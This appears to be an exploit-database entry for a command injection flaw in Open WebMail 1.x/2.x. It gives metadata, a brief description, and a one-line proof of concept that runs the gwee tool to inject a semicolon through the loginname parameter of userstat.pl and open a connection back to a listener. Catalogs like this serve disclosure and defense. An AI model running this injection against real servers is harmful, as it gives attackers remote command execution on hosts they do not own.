Open WebMail 1.x/2.x - Remote Command Execution Variant
Author: Nullbyte
type: remote
platform: linux
port:
date_added: 2004-05-10
date_updated: 2013-01-14
verified: 1
codes: OSVDB-4201
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/10316/info
A vulnerability has been reported in Open WebMail that allows a remote attacker to execute arbitrary commands on a vulnerable host. The problem is due to insufficient sanitization of shell metacharacters that are passed to the vulnerable software through URI parameters.
Exploitation of the vulnerability could allow a non-privileged user to remotely execute arbitrary commands in the context of the web server that is hosting the vulnerable application.
$ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://www.example.com/cgi-bin/openwebmail/userstat.pl